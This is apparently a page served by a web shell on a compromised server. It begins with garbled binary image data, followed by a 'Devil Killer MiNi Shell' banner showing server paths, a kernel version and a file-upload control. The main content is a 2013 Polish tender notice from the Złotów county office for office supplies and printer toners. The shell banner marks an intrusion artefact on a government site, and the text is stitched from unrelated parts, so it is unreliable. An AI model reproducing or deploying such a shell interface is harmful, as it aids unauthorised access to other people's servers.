JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131126/483990-N-2013.html

<p class="kh_header"><b>Złotów: Zakup i dostawa materiałów biurowych, materiałów eksploatacyjnych oraz zamienników do drukarek, kserokopiarek i faksów dla Starostwa Powiatowego w Złotowie</b><br>
<b>Numer ogłoszenia: 483990 - 2013; data zamieszczenia: 26.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Złotowie , Al. Piasta 32, 77-400 Złotów, woj. wielkopolskie, tel. 067 2633220, faks 067 2632802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotow-powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych, materiałów eksploatacyjnych oraz zamienników do drukarek, kserokopiarek i faksów dla Starostwa Powiatowego w Złotowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych oraz materiałów eksploatacyjnych oraz zamienników do drukarek, kserokopiarek i faksów dla Starostwa Powiatowe w Złotowie. Przedmiot zamówienia podzielony został na 2 części:
I część -Zakup i dostawa materiałów biurowych dla Starostwa Powiatowego  w Złotowie
II cześć - Zakup i dostawa materiałów eksploatacyjnych oryginalnych oraz zamienników do drukarek, kserokopiarek i faksów dla Starostwa Powiatowego w Złotowie

Szczegółowy zakres rzeczowy określono w Specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.12.51.10-5, 30.12.51.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta na formularzu ofertowym - załącznik nr 1 do SIWZ (UWAGA! Różny dla każdej części zamówienia).
2.	Zaparafowany projekt umowy - załącznik nr 2 do SIWZ (UWAGA! Różny dla każdej części zamówienia).
3.	Jeżeli reprezentacja/reprezentant Wykonawcy działa na podstawie pełnomocnictwa winien je przedstawić w formie oryginału;
4.	Upoważnienie pełnomocnika (lidera) do reprezentowania Wykonawców  w postępowaniu i zawarciu umowy w przypadku oferty wspólnej (konsorcjum).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych, w zakresie zmian rodzaju asortymentu i jego ilości w zależności od zapotrzebowania Zamawiającego 
2. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy
w stosunku do treści oferty w sytuacji gdy:
1) konieczność wprowadzenia takiej zmiany wynikać będzie z sytuacji, której nie można było wcześniej przewidzieć lub gdy zmiana ta będzie korzystna dla Zamawiającego,
2) zmiany wynagrodzenia Wykonawcy, w przypadku ustawowej zmiany stawki podatku VAT od towarów i usług.
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zlotow-powiat.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, Al. Piasta 32, 77-400 Złotów, I piętro, pokój 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2013 godzina 10:00, miejsce: Starostwo Powiatowe, Al. Piasta 32, 77-400 Złotów, I piętro, pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa materiałów biurowych dla Starostwa Powiatowego  w Złotowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.blok makulaturowy A4 /100 kartkowy, w kratkę, klejony/	20 szt.
2.	blok makulaturowy A5 /100 kartkowy , w kratkę, klejony/	20 szt. 
3.	cienkopis fine 0,4	150 szt. 
4.	datownik mały, biurowy	5 szt. 
5.	deska z klipsem 	5szt. 
6.	długopis automatyczny z wymiennym wkładem, wyposażony w uchwyt antypoślizgowy, długość pisania co najmniej 1000 m, grubość linii: 0,7 mm	200 szt. 
7.	długopis żelowy automatyczny, tusz pigmentowy, wodoodporny i odporny na blaknięcie, średnica kulki piszącej ok. 0,7 mm, grubość linii pisania ok. 0,4 mm, wymienny wkład 	100 szt.
8.	długopis na ladę /połączony metalowym łańcuszkiem z samoprzylepną podstawką, utrzymującą długopis w pozycji pionowej/	25 szt.
9.	dziurkacz biurowy metalowy dziurkuje jednorazowo do 65 kartek 	15 szt.
10.	dziurkacz duży biurowy metalowy dziurkuje jednorazowo do 150 kartek 	10szt. 
11.	folia do laminowania dokumentów A4 100 mic /100 szt. w opak./	4 op.
12.	folia do laminowania dokumentów A5 100 mic /100 szt. w opak./	2 op.
13.	foliopis grubość linii 0,4 mm /pisak do płyt CD/	30 szt.
14.	gumki recepturki opakowanie 1 kg 50 mm	6 op. 
15.	gumka do mazania /biała/	20 szt.
16.	grzbiety do bindowania dokumentów A4 20 mm /100 szt. w opak./	5  op.
17.	grzbiety do bindowania dokumentów A4 12 mm /100 szt. w opak./	5 op. 
18.	identyfikatory na taśmie	40 szt.
19.	kalendarze na biurko /stojące, wymiar co najmniej 13 cm x 20 cm/	100 szt. 
20.	klej  biurowy w sztyfcie mały, bezbarwny, bezwonny, zmywalny, niebrudzący, nietoksyczny, przeznaczony do papieru, fotografii, tektury i tkanin /min. 8 g biały/	100 szt. 
21.	klej biurowy w sztyfcie duży , bezbarwny, bezwonny, zmywalny, niebrudzący, nietoksyczny, przeznaczony do papieru, fotografii, tektury i tkanin /min. 22 g biały/	100 szt. 
22.	koperta biała format DL /samoprzyl./	2.000 szt.  
23.	koperta biała format B5 /samoprzyl./	6.000 szt.  
24.	koperta biała format C4 /samoprzyl./	6.000 szt.  
25.	koperta biała format C6  /samoprzyl./ 	20.000 szt. 
26.	koperta ochronna z wkładką z folii bąbelkowej format B5	50 szt. 
27.	korektor ekologiczny, w taśmie, szerokość taśmy 5 mm, długość taśmy 8 m 	60 szt.
28.	linijka  20 cm, z tworzywa sztucznego, dymna	20 szt. 
29.	marker z tuszem ekologicznym permanentnym, oprawka aluminiowa, okrągła końcówka, szybko schnący 	20 szt. 
30.	markery suchościeralne 	10 szt. 
31.	naboje do rapitografów czarne 	5 op.
32.	nici lniane 10 dag	20 szt.
33.	notes biały /kostka nieklejona/ 83 mm x 83 mm x75  mm	50 szt. 
34.	notesy samoprzylepne żółte 76 mm x76 mm  /100 kartek/ 	100 szt.
35.	notesy samoprzylepne żółte 51 mm x 3,8 mm /100 kartek/	80 szt.
36.	nożyczki biurowe o rozmiarze co najmniej  20,5 cm firmy Donau lub równoważne 	25 szt.
37.	obwoluta A4 /miękka, 50 ?m, otwarta na górze, przezroczysta oraz antyelektrostatyczna, wzmocniony brzeg,  zawieszana, 100 szt. w opakowaniu/ 	33 op. 
38.	ofertówka A4 - twarda 180 ?m, typu L otwarta na górze i wzdłuż brzegu	400 szt. 
39.	okładki do bindowania dokumentów A4  skóropod. /100 szt. w opak./	10 op. 
40.	okładki przeźroczyste do bindowania dokumentów A4  200 mic /100 szt. w opak./	10 op.
41.	ołówek z gumką o twardości HB, dobrej jakości, niełamliwe, wkład grafitowy 	40 szt.
42.	ołówek automatyczny /w plastikowej oprawie/	20 szt. 
43.	papier biały samoprzylepny A 4 /A 20/	8 op. 
44.	papier do plotera KIP 3000, 80g, 914 mm x 175/ 76 mm    AO	10 rolek 
45.	papier kserograficzny A 3 - ryza 80g/m2, białości min.146 ? 3 CIE	40 ryz 
46.	papier kserograficzny A4 - ryza 80g/m2, białości min. 146 ? 3 CIE	1.000 ryz
47.	papier wizytówkowy A 4,246g/m2 /20 szt.  w opakowaniu/ 	100 op.
48.	papier fotograficzny A 4 - błyszczący 170 g/m2 do drukarek atramentowych	10 op.
49.	papier biały gładki A 4, 160 g/m2 /250 kartek   w opakowaniu/	27 op.
50.	pinezki metalowe /10 szt. w opak./	1 op.
51.	płyty CD-R 700 MB	70 szt.  
52.	płyty CD-RW 700 MB	100 szt. 
53.	płyty DVD -R 4,7 GB 16X	100 szt.
54.	poduszka do stempli wymiar co najmniej 150 mm x 96 mm 	5 szt. 
55.	przybornik metalowy z przegrodami na biurko	8 szt. 
56.	rozszywacz do dokumentów	15 szt. 
57.	Rapitograf  0,18 mm	7 szt.  
58.	Rapitograf  0,25 mm	7 szt.  
59.	segregator A4/szerokość 50 mm wykonany z tektury obustronie pokrytej ekologiczną folią polipropylenową o strukturze płótna co najmniej 100 ?m, grubość kartonu co najmniej 2,1 mm, gramatura kartonu co najmniej 1290 g/m2, dźwignia z zaciskaczem, wyposażony w dolną listwę wzmacniającą, wzmocniony otwór na palec, wymienna obustronna etykieta grzbietowa, 	200 szt. 
60.	segregatory A4/szerokość 75 mm wykonany z tektury obustronie pokrytej ekologiczną folią polipropylenową o strukturze płótna co najmniej 100 ?m, grubość kartonu co najmniej 2,1 mm, gramatura kartonu co najmniej 1290 g/m2, dźwignia z zaciskaczem, wyposażony w dolną listwę wzmacniającą, wzmocniony otwór na palec, wymienna obustronna etykieta grzbietowa,	500 szt.
61.	segregatory do archiwizacji szerokość 100 mm /składane, tekturowe/ 	500 szt. 
62.	skoroszyt plastikowy A4 twardy  	500 szt. 
63.	skoroszyt plastikowy zawieszany A4	500 szt. 
64.	skoroszyt tekturowy zawieszany ?  A4	1.000 szt. 
65.	skoroszyt tekturowy zawieszany 1/1 A4	500 szt.
66.	skoroszyt tekturowy wiązany A4 	500 szt.
67.	spinacze duże okrągłe 50 mm /10 szt. w opak./	6 op.
68.	spinacze małe okrągłe 28 mm /10 szt. w opak./	10 op.
69.	szuflada plastikowa A4 na dokumenty, przezroczysta, lekka	15 szt.
70.	taśma klejąca szeroka, pakowa  brązowa o wymiarach co najmniej 48 mm x 50 m 	28 szt. 
71.	taśma klejąca wąska przeźroczysta 	100 szt. 
72.	teczka do podpisu z rozszerzonym grzbietem, wnętrze z grubej tektury, 16 kartek	5 szt. 
73.	teczka na rzepy tekturowa szerokość 3 cm	20 szt. 
74.	teczka wiązana do archiwizacji, bezkwasowa A 4 z opisem	300 szt.
75.	temperówka metalowa pojedyncza	20 szt. 
76.	tusz do pieczątek kauczukowych i polimerowych, nierozlewający się, wodny, wysokiej jakości, butelka min. 25 ml	30 szt. 
77.	wkłady do długopisu, długość pisania co najmniej 1.000 m, grubość linii: 0,7 mm	85 szt. 
78.	wkłady do długopisu żelowego, tusz pigmentowy, wodoodporny i odporny na blaknięcie, średnica kulki piszącej ok. 0,7 mm, grubość linii pisania ok. 0,4 mm, 	50 szt. 
79.	Wkład do długopisów typu Zenith  metalowy odporny na działanie światła i wody, średnica kulki wkładu: 0,8 mm, szerokość linii pisania: 0,5 - 0,7 mm, długość linii pisania: 3500 m	20 szt.
80.	zakreślacz bezzapachowy, atrament pigmentowy, duża odporność na wysychanie, ze ściętą końcówką, tusz na bazie wody, końcówka o wymiarach 5mm na 2 mm	100 szt. 
81.	zeszyt A4 96 kartkowy w kratkę  
 /w twardej oprawie/	35 szt. 
82.	zeszyt A5 60 kartkowy w kratkę /w twardej oprawie/	30 szt.  
83.	zeszyt A5 16 kartkowy w kratkę, miękka okładka	15 szt. 
84.	zszywacz biurowy metalowy, zszywający co najmniej 50 kartek	10 szt. 
85.	zszywacz duży biurowy metalowy, zszywający co najmniej 100 kartek	10 szt.
86.	zszywki 24/6    1000 /10 szt. w opak./	30 op.
87.	zszywki 23/13 /1000/ 	10 szt.
88.	Mechanizm skoroszytowy z metalową blaszką, długość całkowita 150 mm, szerokość całkowita 34 mm, pakowane 25 szt. 	10 op.

Zamawiający nabywa materiały biurowe sukcesywnie, zgodnie z okresowymi zamówieniami. Możliwa jest zmiana asortymentu i jego ilości w zależności od zapotrzebowania Zamawiającego. Dostawa nastąpić musi w terminie do 3 dni roboczych od dnia zamówienia okresowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa materiałów eksploatacyjnych oryginalnych oraz zamienników do drukarek, kserokopiarek i faksów dla Starostwa Powiatowego w Złotowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	toner do drukarki Lexmark E120 - oryginalny /2.000 stron/	30 szt.
2. 	toner do drukarki Lexmark E120 -  zamiennik, wydajność nie mniejsza niż oryginalny 	8 szt.
3.	toner do drukarki Lexmark T420 - oryginalny /5.000 stron/	3 szt.
4.	toner do drukarki Lexmark T420 - zamiennik, wydajność nie mniejsza niż oryginalny	2 szt.
5.	toner do drukarki Lexmark T640 - oryginalny /6.000 stron/	2 szt.
6.	toner do drukarki Lexmark T640 - zamiennik, wydajność nie mniejsza niż oryginalny	2szt.
7.	tusz do plotera HP DJ 500 - oryginalny czarny HP 10B, C 4844 A /69 ml/ 	2 szt.
8.	tusz do plotera HP DJ 500 - oryginalny niebieski HP 82, C 4911A /69 ml/	2 szt.
9.	tusz do plotera HP DJ 500 - oryginalny purpurowy  HP 82, C 4912A /69 ml/	2szt.
10.	tusz do plotera HP DJ 500 - oryginalny żółty HP 82, C 4913A /69 ml/	2szt.
11.	tusz do drukarki HP 703 czarny - oryginalny /4 ml/	8 szt.
12.	tusz do drukarki HP 703 kolor - oryginalny /4 ml/	8 szt.
13.	tusz do drukarki HP DeskJet  6980 /21 ml/ czarny - oryginalny	2 szt.
14.	tusz do drukarki HP DeskJet  6980 /21 ml/ kolor - oryginalny	2 szt.
15.	tusz do drukarki  HP DeskJet 930C czarny - oryginalny /42 ml/	2 szt.
16.	tusz do drukarki HP DeskJet 930C kolor- oryginalny /19 ml/	2 szt.
17.	tusz do drukarki HP 940C czarny - oryginalny /25 ml/	3 szt.
18.	tusz do drukarki HP 940C kolor - oryginalny  /19 ml/	3 szt.
19.	toner do drukarki HP LJ P1005 - oryginalny /1.500 stron/	2 szt.
20.	toner do drukarki HP LJ P1005 - zamiennik, wydajność nie mniejsza niż oryginalny	10 szt.
21.	toner do drukarki HP LaserJet 1020 -  oryginalny /2.000 stron/	2 szt.
22.	toner do drukarki HP LaserJet 1020 - zamiennik, wydajność nie mniejsza niż oryginalny	10 szt.
23.	toner do drukarki HP LJ 1200 series - oryginalny /2.500 stron/	2 szt.
24.	toner do drukarki HP LJ 1200 series - zamiennik, wydajność nie mniejsza niż oryginalny	4 szt.
25.	toner do drukarki HP LJ 1300 - oryginalny /2.500 stron/	2 szt.
26.	toner do drukarki HP LJ 1300 - zamiennik, wydajność nie mniejsza niż oryginalny	7 szt.
27.	toner do drukarki HP LJ 1320 - oryginalny /2.500 stron/	2 szt.
28.	toner do drukarki HP LJ 1320 - zamiennik, wydajność nie mniejsza niż oryginalny	2 szt.
29.	toner do drukarki HP LJ P2055d  oryginalny /05X 6.500 stron/	2 szt.
30.	toner do drukarki HP LJ P2055d  - zamiennik, wydajność nie mniejsza niż oryginalny	3 szt.
31.	toner do drukarki HP Color LJ CM2320nf czarny  - oryginalny /2.800 stron/ 
304 A, HP CC 530 A	2 szt.
32.	toner  do drukarki HP Color LJ CM2320nf niebieski - oryginalny /2.800 stron/
304 A, HP CC 531 A	2 szt.
33.	toner do drukarki HP Color LJ CM2320nf purpura - oryginalny /2.800 stron/
304 A, HP CC 533 A	2 szt.
34.	toner do drukarki HP Color LJ CM2320nf  żółty - oryginalny /2.800 stron/
304 A, HP CC 532 A	2 szt. 
35.	toner do drukarki HP LJ  CP 3525 dn czarny oryginalny /5.000  stron/ HP 504 A, CE 250A	4 szt.
36.	toner do drukarki HP LJ CP 3525 dn CYAN oryginalny /7.000 stron/ HP 504 A, CE 251 A	2 szt.
37.	toner do drukarki HP LJ CP 3525 dn YELLOW oryginalny /7.000 stron/ HP 504 A, CE 252 A	2 szt.
38.	toner do drukarki  HP LJ CP 3525 dn MAGENTA oryginalny /7.000 stron/ HP 504 A, CE 253 A 	2 szt.
39.	toner do kserokopiarki Sharp AR 5516N - oryginalny	4 szt.
40.	toner do kserokopiarki Sharp AR-M 276 oryginalny 	4 szt.
41.	toner do kserokopiarki Sharp AR-M316 - oryginalny	1 szt.
42.	toner do kserokopiarki Sharp ARM 207 - oryginalny	4 szt.
43.	toner do drukarki KYOCERA FS-1116 MFP - oryginalny	1 szt.
44.	toner do drukarki KYOCERA FS-1116 MFP - zamiennik, wydajność nie mniejsza niż oryginalny	2 szt.
45.	toner do drukarki Kyocera FS-1028 MFP oryginalny	2 szt.
46.	toner do drukarki Kyocera FS-1028 MFP zamiennik, wydajność nie mniejsza niż oryginalny	15 szt.
